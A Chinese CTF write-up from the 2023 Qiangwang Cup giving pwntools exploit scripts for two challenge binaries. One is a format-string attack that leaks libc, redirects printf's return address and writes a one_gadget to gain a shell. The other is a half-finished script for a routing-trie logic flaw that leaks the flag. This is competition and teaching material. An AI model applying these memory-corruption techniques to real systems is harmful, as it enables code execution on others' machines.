2023 强网杯小记

昨天5点强网杯结束，坐牢两天，折磨的一批

强网先锋

ez_fmt

泄露libc基址，修改printf函数返回地址为start重新执行，修改main返回地址为one_gadget

ps:printf函数内部执行ret指令前，数据已经修改完成，所以修改printf函数返回地址也是ok的

from pwn import *
context(log_level='debug',arch='amd64')
p=process('./ez_fmt')
#p=remote('47.104.24.40',1337)

p.recvuntil(b'There is a gift for you ')
stack=int(p.recv(14),16)+0x68
stack1=stack-0x70
log.success('stack => '+hex(stack))

read=0x40121B
printf=0x4011ED
start=0x4010B0
exe=0xe3afe
fake=exe+0x7fa8eb328000
p.recv()

gdb.attach(p,'b *0x401239')
pause()

payload=b'%19$p'+b'%'+str((start&0xffff)-0xe).encode('utf-8')+b'c%9$hn'
payload=payload.ljust(24,b'a')
payload+=p64(stack1)
p.send(payload)
libcbase=int(p.recv(14),16)-0x24083
log.success('libcbase => '+hex(libcbase))

exe=0xe3b01+libcbase
log.success('exe =>'+hex(exe))
p.recvuntil(b'There is a gift for you ')
stack2=int(p.recv(14),16)+0x68
log.success('stack2 =>'+hex(stack2))

payload=b'%'+str(((exe>>16)&0xff)).encode('utf-8')+b'c%10$hhn'
payload+=b'%'+str((exe&0xffff)-((exe>>16)&0xff)).encode('utf-8')+b'c%11$hn'
payload=payload.ljust(32,b'a')
payload+=p64(stack2+2)+p64(stack2)
p.send(payload)
p.interactive()

trie

逻辑漏洞，思路是通过add添加destination IP使next hop写到secret上，调用get_flag把flag覆盖到secret，view把flag打出来

难点在于确定destination IP的值

贴个半成品wp(未完待续…)

from pwn import *
context(log_level='debug',arch='amd64')
#p=remote(b'47.104.150.173',1337)
p=process('./trie')

gdb.attach(p,'b *$rebase(0x157E)')
pause()

def add(ip,hop):
    p.sendlineafter(b'4. Quit.\n',b'1')
    p.sendlineafter(b'Input destination IP:\n',ip)
    p.sendlineafter(b'Input the next hop:',hop)

def view(ip):
    p.sendlineafter(b'4. Quit.\n',b'2')
    p.sendlineafter(b'Input destination IP:\n',ip)

def flag():
    p.sendlineafter(b'4. Quit.\n',b'3')

add(b'1.1.1.1',b'2.2.2.2')
add(b'0.0.0.0',b'255.255.255.255') #1
add(b'128.0.0.0',b'255.255.255.255') #2
add(b'192.0.0.0',b'255.255.255.255') #4

flag()
view(b'0.0.0.0')
view(b'128.0.0.0')
view(b'192.0.0.0')

p.recv()
p.interactive()